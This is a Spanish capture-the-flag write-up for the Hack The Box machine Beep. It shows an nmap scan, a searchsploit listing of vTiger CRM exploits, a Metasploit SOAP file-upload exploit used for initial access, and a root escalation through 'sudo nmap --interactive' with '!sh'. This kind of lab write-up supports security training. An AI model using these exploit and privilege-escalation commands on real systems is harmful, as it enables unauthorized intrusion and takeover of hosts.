Esta es la segunda vez que hackeo BEEP de HTB pero como ya lo hice sin MSF ahora lo hare con MSF.

Con NMAP podemos ver:

host        port   proto  name       state  info
----        ----   -----  ----       -----  ----
10.10.10.7  22     tcp    ssh        open   OpenSSH 4.3 protocol 2.0
10.10.10.7  25     tcp    smtp       open   Postfix smtpd
10.10.10.7  80     tcp    http       open   Apache httpd 2.2.3
10.10.10.7  110    tcp    pop3       open   Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  111    tcp    rpcbind    open   2 RPC #100000
10.10.10.7  143    tcp    imap       open   Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  443    tcp    ssl/http   open   Apache httpd 2.2.3 (CentOS)
10.10.10.7  993    tcp    ssl/imap   open   Cyrus imapd
10.10.10.7  995    tcp    pop3       open   Cyrus pop3d
10.10.10.7  3306   tcp    mysql      open   MySQL unauthorized
10.10.10.7  4445   tcp    upnotifyp  open   
10.10.10.7  10000  tcp    http       open   MiniServ 1.570 Webmin httpd

Dirbuster nos muestra vtiger

Si buscamos vtiger en searchsploit

root@Kali2:~/Downloads# searchsploit vtiger
------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                               	|  Path
                                                                                                                                             	| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Vtiger - 'Install' Remote Command Execution (Metasploit)                                                                                     	| exploits/php/remote/32794.rb
Vtiger CRM 6.3.0 - (Authenticated) Arbitrary File Upload (Metasploit)                                                                        	| exploits/php/webapps/44379.rb
Vtiger CRM 7.1.0 - Remote Code Execution                                                                                                     	| exploits/php/webapps/46065.py
vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions                                                                                   	| exploits/php/webapps/2508.txt
vTiger CRM 4.2 - SQL Injection                                                                                                               	| exploits/php/webapps/26586.txt
vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting                                                                                  	| exploits/php/webapps/26584.txt
vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting                                                                            	| exploits/php/webapps/26585.txt
vTiger CRM 5.0.4 - Local File Inclusion                                                                                                      	| exploits/php/webapps/16280.py
vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities                                                                             	| exploits/php/webapps/32307.txt
vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting                          	| exploits/php/webapps/9450.txt
vTiger CRM 5.1.0 - Local File Inclusion                                                                                                      	| exploits/php/webapps/18770.txt
vTiger CRM 5.2 - 'onlyforuser' SQL Injection                                                                                                 	| exploits/php/webapps/36208.txt
vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities                                                               	| exploits/php/webapps/36204.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1)                                                             	| exploits/php/webapps/36203.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)                                                             	| exploits/php/webapps/36255.txt
vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion                                                                                 	| exploits/php/webapps/35574.txt
vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting                                                                                  	| exploits/php/webapps/35577.txt
vTiger CRM 5.3.0 5.4.0 - (Authenticated) Remote Code Execution (Metasploit)                                                                  	| exploits/php/remote/29319.rb
vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection                                                                                     	| exploits/php/webapps/28409.txt
vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)                                                                	| exploits/php/remote/30787.rb
vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities                                                                                             	| exploits/php/webapps/27279.txt
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion                                                                         	| exploits/php/webapps/32213.txt
vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution                                                                                     	| exploits/php/webapps/38345.txt
------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Podemos usar el de metasploit para conseguir user

use exploit/multi/http/vtiger_soap_upload
msf exploit(vtiger_soap_upload) > set SSL true
msf exploit(vtiger_soap_upload) > set RPORT 443

Para hacer prives manual podemos ver que nmap se puede ejecutar:

sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

Haciendo sudo nmap –interactive tenemos root 🙂

sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)